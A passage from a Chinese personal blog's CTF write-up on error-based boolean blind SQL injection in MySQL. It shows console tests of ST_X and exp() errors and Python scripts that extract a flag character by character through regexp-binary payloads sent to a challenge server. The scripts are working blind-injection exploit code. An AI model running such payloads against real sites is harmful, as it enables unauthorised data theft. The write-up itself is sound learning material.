<p>ST_X是返回一个坐标的x坐标，所以需要用Point函数来传入坐标，ST_GemoFromText函数的作用是将返回的坐标变成字符串。当POINT传入的不是一个坐标时，语句也可以执行，只有当需要返回这个x坐标时才会报错。</p>
<p>我们可以通过返回的页面来判断bool盲注有没有成功，返回0或任何数字会出现cat.png，mysql查询语句报错会出现空白页面（状态码为500的错误）</p>
<p>然后发现只要传入ST_X(数字)可以达到一样的效果。也就是SELECT IF({}, ST_X(MADS), 0);只要传入的参数不正确，就可以达到我们想要的效果。</p>
<p>这里的ST_X等函数在低版本中运行不了</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/19.png" alt="19"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt;  SELECT IF(0, ST_X(ST_GeomFromText(&#39;POINT(a)&#39;)), 0);</span><br><span class="line">+---------------------------------------------+</span><br><span class="line">| IF(0, ST_X(ST_GeomFromText(&#39;POINT(a)&#39;)), 0) |</span><br><span class="line">+---------------------------------------------+</span><br><span class="line">|                                           0 |</span><br><span class="line">+---------------------------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt;  SELECT IF(1, ST_X(ST_GeomFromText(&#39;POINT(aaaa)&#39;)), 0);</span><br><span class="line">ERROR 3037 (22023): Invalid GIS data provided to function st_geometryfromtext.</span><br><span class="line">mysql&gt;  SELECT IF(1, ST_X(ST_GeomFromText(&#39;POINT(122)&#39;)), 0);</span><br><span class="line">ERROR 3037 (22023): Invalid GIS data provided to function st_geometryfromtext.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">mysql&gt;  SELECT IF(0, ST_X(ST_GeomFromText(&#39;POINT(1111 1111)&#39;)), 0);</span><br><span class="line">+-----------------------------------------------------+</span><br><span class="line">| IF(0, ST_X(ST_GeomFromText(&#39;POINT(1111 1111)&#39;)), 0) |</span><br><span class="line">+-----------------------------------------------------+</span><br><span class="line">|                                                   0 |</span><br><span class="line">+-----------------------------------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt;  SELECT IF(1, ST_X(ST_GeomFromText(&#39;POINT(11 12)&#39;)), 0);</span><br><span class="line">+-------------------------------------------------+</span><br><span class="line">| IF(1, ST_X(ST_GeomFromText(&#39;POINT(11 12)&#39;)), 0) |</span><br><span class="line">+-------------------------------------------------+</span><br><span class="line">|                                              11 |</span><br><span class="line">+-------------------------------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt;  SELECT IF(0, ST_X(5), 0);</span><br><span class="line">+-------------------+</span><br><span class="line">| IF(0, ST_X(5), 0) |</span><br><span class="line">+-------------------+</span><br><span class="line">|                 0 |</span><br><span class="line">+-------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt;  SELECT IF(1, ST_X(5), 0);</span><br><span class="line">ERROR 3037 (22023): Invalid GIS data provided to function st_x.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">mysql&gt; SELECT IF(0, ST_GeomFromText(&#39;a&#39;), 0);</span><br><span class="line">+--------------------------------+</span><br><span class="line">| IF(0, ST_GeomFromText(&#39;a&#39;), 0) |</span><br><span class="line">+--------------------------------+</span><br><span class="line">| 0                              |</span><br><span class="line">+--------------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; mysql&gt;SELECT IF(1, ST_GeomFromText(&#39;2&#39;), 0)</span><br><span class="line">    -&gt; ;</span><br><span class="line">ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;SELECTSELECT IF(1, ST_GeomFromText(&#39;2&#39;), 0)&#39; at line 1</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/7.png" alt="7"></p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/8.png" alt="8"></p>
<p>据此，我们可以编写判断我们的猜想是否成立，结果是成立的。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://47.98.234.232:28059/index.php?cat=1	and	IF((select	flag	from	flag)	regexp	binary	0x66,0,ST_X(111))&quot;</span></span><br><span class="line">r = requests.get(url)</span><br><span class="line">print(r.status_code)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/10.png" alt="10"></p>
<p>到这里，我们可以通过bool盲注来判断我们的输入是否正确，但是，到此，我只能判断有哪些字符在flag中，不能按顺序把字符连接起来得到payload。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ord2hex</span>(<span class="params">string</span>):</span></span><br><span class="line">	result = <span class="string">&quot;&quot;</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> string:</span><br><span class="line">		r = hex(ord(i));</span><br><span class="line">		r = r.replace(<span class="string">&#x27;0x&#x27;</span>,<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">		result = result+r</span><br><span class="line">	<span class="keyword">return</span> <span class="string">&#x27;0x&#x27;</span>+result</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://47.98.234.232:28045/index.php?cat=&quot;</span></span><br><span class="line">tables = <span class="string">&#x27;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-&#125;&#123;&#x27;</span></span><br><span class="line">result=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="comment">#for i in range(1,70):</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> tables:</span><br><span class="line">		payload = <span class="string">&quot;1	and	IF((select	flag	from	flag)	regexp	binary	%s,0,ST_X(111))&quot;</span>%(ord2hex(j))</span><br><span class="line">		r = requests.get(url+payload);</span><br><span class="line">		<span class="keyword">if</span>  r.status_code==<span class="number">200</span>:</span><br><span class="line">			print(j)</span><br></pre></td></tr></table></figure>

<p>输出结果</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">a</span><br><span class="line">b</span><br><span class="line">c</span><br><span class="line">d</span><br><span class="line">f</span><br><span class="line">g</span><br><span class="line">l</span><br><span class="line">0</span><br><span class="line">2</span><br><span class="line">4</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">-</span><br><span class="line">&#125;</span><br><span class="line">&#123;</span><br><span class="line">[Finished in 7.7s]</span><br></pre></td></tr></table></figure>

<p>到这里就又没有思路了，通过阅读writeup后的想法是，发现可以利用正则的<code>^</code>来按照flag实现匹配得到flag。这里的^表示匹配开始行。利用它，我们第一个字符只能匹配f，第二个字符如果跟第一个字符连接起来，就是<code>^f?</code>，这里的？只能是l，最终我们可以按顺序得到payload。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select (select flag from flag)regexp &#39;^a&#39;;</span><br><span class="line">+------------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;^a&#39; |</span><br><span class="line">+------------------------------------+</span><br><span class="line">|                                  0 |</span><br><span class="line">+------------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp &#39;a&#39;;</span><br><span class="line">+-----------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;a&#39; |</span><br><span class="line">+-----------------------------------+</span><br><span class="line">|                                 1 |</span><br><span class="line">+-----------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp &#39;^f&#39;;</span><br><span class="line">+------------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;^f&#39; |</span><br><span class="line">+------------------------------------+</span><br><span class="line">|                                  1 |</span><br><span class="line">+------------------------------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">def ord2hex(string):</span><br><span class="line">	result &#x3D; &quot;&quot;</span><br><span class="line">	for i in string:</span><br><span class="line">		r &#x3D; hex(ord(i));</span><br><span class="line">		r &#x3D; r.replace(&#39;0x&#39;,&#39;&#39;)</span><br><span class="line">		result &#x3D; result+r</span><br><span class="line">	return &#39;0x&#39;+result</span><br><span class="line"></span><br><span class="line">url &#x3D; &quot;http:&#x2F;&#x2F;47.98.234.232:28010&#x2F;index.php?cat&#x3D;&quot;</span><br><span class="line">tables &#x3D; &#39;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-&#125;&#123;&#39;</span><br><span class="line">result&#x3D;&quot;&quot;</span><br><span class="line">for i in range(1,10):</span><br><span class="line">	for j in tables:</span><br><span class="line">		payload &#x3D; &quot;1	and	IF((select	flag	from	flag)	regexp	binary	%s,0,ST_X(111))&quot;%(ord2hex(&quot;^&quot;+result+j))</span><br><span class="line">		r &#x3D; requests.get(url+payload);</span><br><span class="line">		if  r.status_code&#x3D;&#x3D;200:</span><br><span class="line">			result&#x3D;result+j</span><br><span class="line">			print(result)</span><br><span class="line">			break</span><br></pre></td></tr></table></figure>

<p>执行这个脚本，有时候可以成功返回flag，有时候只返回flag{，师兄说因为{被当作了正则表达式里面的标记限定符，导致报错，但在本地尝试也没有报错</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/20.png" alt="20"></p>
<p>但是在执行过程中有时候会报错，有时候不会报错，如果报错就在花括号前面加入转义字符，实践证明，加上反义字符也可以正常执行语句。</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/13.png" alt="13"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select (select flag from flag)regexp &#39;^flag\\&#123;&#39;;</span><br><span class="line">+------------------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;^flag\\&#123;&#39; |</span><br><span class="line">+------------------------------------------+</span><br><span class="line">|                                        1 |</span><br><span class="line">+------------------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp &#39;^flag\&#123;&#39;;</span><br><span class="line">+-----------------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;^flag\&#123;&#39; |</span><br><span class="line">+-----------------------------------------+</span><br><span class="line">|                                       1 |</span><br><span class="line">+-----------------------------------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ord2hex</span>(<span class="params">string</span>):</span></span><br><span class="line">	result = <span class="string">&quot;&quot;</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> string:</span><br><span class="line">		r = hex(ord(i));</span><br><span class="line">		r = r.replace(<span class="string">&#x27;0x&#x27;</span>,<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">		result = result+r</span><br><span class="line">	<span class="keyword">return</span> <span class="string">&#x27;0x&#x27;</span>+result</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://47.98.234.232:28050/index.php?cat=&quot;</span></span><br><span class="line">tables = <span class="string">&#x27;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-&#125;&#123;&#x27;</span></span><br><span class="line">result=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">70</span>):</span><br><span class="line">	<span class="keyword">for</span> j <span class="keyword">in</span> tables:</span><br><span class="line">		<span class="keyword">if</span> j ==<span class="string">&quot;&#123;&quot;</span> <span class="keyword">or</span> j==<span class="string">&quot;&#125;&quot;</span>:</span><br><span class="line">			j=<span class="string">&#x27;\\&#x27;</span>+j</span><br><span class="line">		payload = <span class="string">&quot;1	and	IF((select	flag	from	flag)	regexp	binary	%s,0,ST_X(111))&quot;</span>%(ord2hex(<span class="string">&quot;^&quot;</span>+result+j))</span><br><span class="line">		r = requests.get(url+payload);</span><br><span class="line">		</span><br><span class="line">		<span class="keyword">if</span>  r.status_code==<span class="number">200</span>:</span><br><span class="line">			result=result+j</span><br><span class="line">			print(result.replace(<span class="string">&#x27;\\&#x27;</span>,<span class="string">&#x27;&#x27;</span>))</span><br><span class="line">			<span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/14.png" alt="14"></p>
<h2 id="plus"><a href="#plus" class="headerlink" title="plus"></a>plus</h2><p>plus与它的原题很相似，直接用原题的payload试试</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://47.98.234.232:28059/index.php?cat=1	and	IF((select	flag	from	flag)	regexp	binary	0x66,0,ST_X(111))&quot;</span></span><br><span class="line">r = requests.get(url)</span><br><span class="line">print(r.status_code)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/22.png" alt="22"></p>
<p>进行调试发现ST_X，ST_GeomFromText，ST_MPointFromText都被过滤，到这里也就没啥思路了。然后，看到大佬分享的一篇文章，<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/4914">SQL注入思考基于运行时错误的盲注</a>，发现我们只要找到一个函数代替ST_X函数就可以，发现可以利用exp函数的参数在大于709的情况下会导致sql语句执行失败。但是mysql版本不同会导致不同的结果。</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/17.png" alt="17"></p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/18.png" alt="18"></p>
<p>据此编写脚本测试会不会报错</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://47.98.234.232:28014/index.php?cat=1	and	IF((select	flag	from	flag)	regexp	binary	0x66,0,exp(4444))&quot;</span></span><br><span class="line">r = requests.get(url)</span><br><span class="line">print(r.status_code)</span><br><span class="line">print(r.text)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/21.png" alt="21"></p>
<p>最终payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">def ord2hex(string):</span><br><span class="line">	result &#x3D; &quot;&quot;</span><br><span class="line">	for i in string:</span><br><span class="line">		r &#x3D; hex(ord(i));</span><br><span class="line">		r &#x3D; r.replace(&#39;0x&#39;,&#39;&#39;)</span><br><span class="line">		result &#x3D; result+r</span><br><span class="line">	return &#39;0x&#39;+result</span><br><span class="line"></span><br><span class="line">url &#x3D; &quot;http:&#x2F;&#x2F;47.98.234.232:28014&#x2F;index.php?cat&#x3D;&quot;</span><br><span class="line">tables &#x3D; &#39;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-&#125;&#123;&#39;</span><br><span class="line">result&#x3D;&quot;&quot;</span><br><span class="line">for i in range(1,70):</span><br><span class="line">	for j in tables:</span><br><span class="line">		if j &#x3D;&#x3D;&quot;&#123;&quot; or j&#x3D;&#x3D;&quot;&#125;&quot;:</span><br><span class="line">			j&#x3D;&#39;\\&#39;+j</span><br><span class="line">		payload &#x3D; &quot;1	and	IF((select	flag	from	flag)	regexp	binary	%s,0,exp(1111))&quot;%(ord2hex(&quot;^&quot;+result+j))</span><br><span class="line">		r &#x3D; requests.get(url+payload);</span><br><span class="line">		</span><br><span class="line">		if  r.status_code&#x3D;&#x3D;200:</span><br><span class="line">			result&#x3D;result+j</span><br><span class="line">			print(result.replace(&#39;\\&#39;,&#39;&#39;))</span><br><span class="line">			break</span><br></pre></td></tr></table></figure>

<p>参考链接</p>
<p><a target="_blank" rel="noopener" href="https://www.nhooo.com/sql/func-mysql-binary.html">MySQL BINARY 函数使用</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/zhaoyangjian724/article/details/38644591">REGEXP_SUBSTR函数用法</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/4914">SQL注入思考基于运行时错误的盲注</a></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/12/22/Docker%E7%9A%84%E4%B8%AD%E5%A4%AE%E4%BB%93%E5%BA%93/" rel="prev" title="初识docker">
      <i class="fa fa-chevron-left"></i> 初识docker
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A4%E6%96%ADbool%E7%9B%B2%E6%B3%A8"><span class="nav-number">1.</span> <span class="nav-text">判断bool盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#IF%E5%87%BD%E6%95%B0"><span class="nav-number">2.</span> <span class="nav-text">IF函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#regexp%E5%87%BD%E6%95%B0%E5%92%8Cbinary%E5%87%BD%E6%95%B0"><span class="nav-number">3.</span> <span class="nav-text">regexp函数和binary函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%97%A0%E5%88%A4%E6%96%AD%E5%AD%97%E7%AC%A6mysql%E6%9F%A5%E8%AF%A2"><span class="nav-number">4.</span> <span class="nav-text">无判断字符mysql查询</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#bool%E7%9B%B2%E6%B3%A8"><span class="nav-number">5.</span> <span class="nav-text">bool盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#plus"><span class="nav-number">6.</span> <span class="nav-text">plus</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zoey"
      src="/images/1.jpg">
  <p class="site-author-name" itemprop="name">zoey</p>
  <div class="site-description" itemprop="description">Hello!</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      博客链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://www.yoyo2tong.xyz/" title="http:&#x2F;&#x2F;www.yoyo2tong.xyz&#x2F;">myblog</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zoey</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">76k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">1:09</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  















  

  

</body>
</html>
